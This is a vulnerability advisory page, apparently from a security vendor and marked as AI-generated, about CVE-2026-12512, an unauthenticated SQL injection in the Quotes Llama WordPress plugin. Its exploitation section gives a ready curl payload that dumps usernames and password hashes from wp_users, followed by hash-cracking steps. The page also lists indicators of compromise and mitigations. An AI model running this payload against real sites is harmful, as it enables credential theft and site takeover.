CVE-2026-12512
WordPress Análisis y mitigación de vulnerabilidades

Vista general

CVE-2026-12512 is an unauthenticated UNION-based SQL injection vulnerability in the Quotes Llama WordPress plugin affecting all versions before 3.1.6. The flaw allows unauthenticated attackers to read arbitrary data from the WordPress database, including password hashes, by exploiting an unsanitized user-supplied parameter (sc) in a SQL query. It was publicly disclosed on 2026-06-24 and assigned a CVSS score of 8.6 (High) (WPScan). The vulnerability was discovered and submitted by Pablo González Pérez, Francisco José Ramírez Vicente, and Iñigo Sánchez Enciso (WPScan). A patch was released in version 3.1.6 (GitHub Advisory).

Técnicas

The vulnerability is classified as CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) and stems from the plugin's failure to sanitize or escape the sc POST parameter before incorporating it into a SQL query (WPScan). Exploitation is performed via HTTP POST requests to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) using the action=select_search or action=select_search_page handlers. The attack requires two preconditions that represent normal plugin usage: a public page rendering a Quotes Llama shortcode (e.g., [quotes-llama mode=page]) to obtain a nonce value, and at least one quote entry in the plugin's database table. No authentication is required, making this exploitable by any anonymous visitor (WPScan).

Impacto

Successful exploitation allows an unauthenticated attacker to extract arbitrary data from the WordPress database via UNION-based SQL injection, including all WordPress user credentials (usernames and password hashes from wp_users) and any other sensitive data stored in the database (WPScan). Compromised password hashes can be subjected to offline cracking, potentially enabling full administrative access to the WordPress site and further lateral movement. The attack is entirely network-accessible and requires no prior authentication, significantly broadening the exposure surface for any internet-facing WordPress installation running the affected plugin (GitHub Advisory).

Pasos de explotación

  1. Reconnaissance: Identify WordPress sites running the Quotes Llama plugin (versions before 3.1.6) using tools like WPScan, Shodan, or by checking plugin metadata at /wp-content/plugins/quotes-llama/.
  2. Locate a shortcode page: Browse the target site to find a public page rendering the [quotes-llama mode=page] shortcode, which exposes the quotes_llama_nonce value in the HTML source.
  3. Extract the nonce: Read the nonce value from the page HTML (e.g., nonce="abc123") — this is required for the AJAX request.
  4. Verify injection (predicate test): Send a POST request to /wp-admin/admin-ajax.php with action=select_search, search_form=1, nonce=<extracted_nonce>, term=NO_SUCH_501510, and sc=quote OR 1=1#. A returned quote confirms the sc parameter is injected as raw SQL.
  5. Extract credentials (UNION attack): Send the following request to dump all WordPress user logins and password hashes:
curl -sk "https://TARGET/wp-admin/admin-ajax.php" -X POST \
  --data-urlencode "action=select_search" --data-urlencode "search_form=1" \
  --data-urlencode "nonce=<extracted_nonce>" --data-urlencode "term=NO_SUCH_501510" \
  --data-urlencode "sc=quote LIKE 0 UNION SELECT user_login,NULL,NULL,NULL,user_pass,NULL,NULL,NULL,NULL FROM wp_users#" \
  --data-urlencode "target=quotes-llama-search"
  1. Crack hashes: Use offline tools (e.g., Hashcat, John the Ripper) against the extracted WordPress password hashes ($P$B... or $wp$2y$...) to recover plaintext passwords.
  2. Achieve full access: Use recovered admin credentials to log into the WordPress dashboard and gain complete site control (WPScan).

Indicadores de compromiso

  • Network: Unusual HTTP POST requests to /wp-admin/admin-ajax.php with action=select_search or action=select_search_page parameters containing SQL keywords such as UNION, SELECT, OR 1=1, or # in the sc field.
  • Logs: WordPress or web server access logs showing repeated POST requests to admin-ajax.php from the same IP with varying sc parameter values; requests with URL-encoded SQL syntax (e.g., %20UNION%20SELECT).
  • Logs: Database query logs (if enabled) showing unexpected UNION SELECT queries against wp_users or other sensitive tables originating from the plugin's query context.
  • Behavioral: A high volume of AJAX requests to admin-ajax.php from unauthenticated sessions, particularly with search_form=1 or search_for_quote=1 parameters (WPScan).

Mitigación y soluciones alternativas

The primary remediation is to update the Quotes Llama WordPress plugin to version 3.1.6 or later, which includes proper sanitization and escaping of the affected parameter (WPScan, GitHub Advisory). If an immediate update is not possible, consider disabling the plugin until the patch can be applied. As additional mitigations, deploy a Web Application Firewall (WAF) with rules to block SQL injection patterns in POST parameters, restrict access to wp-admin/admin-ajax.php by IP where feasible, and review database access logs for signs of prior exploitation. After patching, consider resetting WordPress user passwords as a precaution if exploitation cannot be ruled out.

Recursos adicionales


FuenteEste informe se generó utilizando IA

Relacionado WordPress Vulnerabilidades:

CVE ID

Severidad

Puntuación

Tecnologías

Nombre del componente

Exploit de CISA KEV

Tiene arreglo

Fecha de publicación

CVE-2026-12512HIGH8.6
  • quotes-llama
NoJul 15, 2026
CVE-2026-12281HIGH8.1
  • shibboleth
NoJul 15, 2026
CVE-2026-12997HIGH7.5
  • gravityforms
NoJul 15, 2026
CVE-2026-11580MEDIUM5.5
  • kali-forms
NoJul 15, 2026
CVE-2026-11579MEDIUM5.3
  • kali-forms
NoJul 15, 2026

Evaluación gratuita de vulnerabilidades

Compare su postura de seguridad en la nube

Evalúe sus prácticas de seguridad en la nube en 9 dominios de seguridad para comparar su nivel de riesgo e identificar brechas en sus defensas.

Solicitar evaluación

Recursos adicionales de Wiz

Obtén una demostración personalizada

¿Listo para ver a Wiz en acción?

"La mejor experiencia de usuario que he visto en mi vida, proporciona una visibilidad completa de las cargas de trabajo en la nube."
David EstlickCISO
"Wiz proporciona un panel único para ver lo que ocurre en nuestros entornos en la nube."
Adam FletcherJefe de Seguridad
"Sabemos que si Wiz identifica algo como crítico, en realidad lo es."
Greg PoniatowskiJefe de Gestión de Amenazas y Vulnerabilidades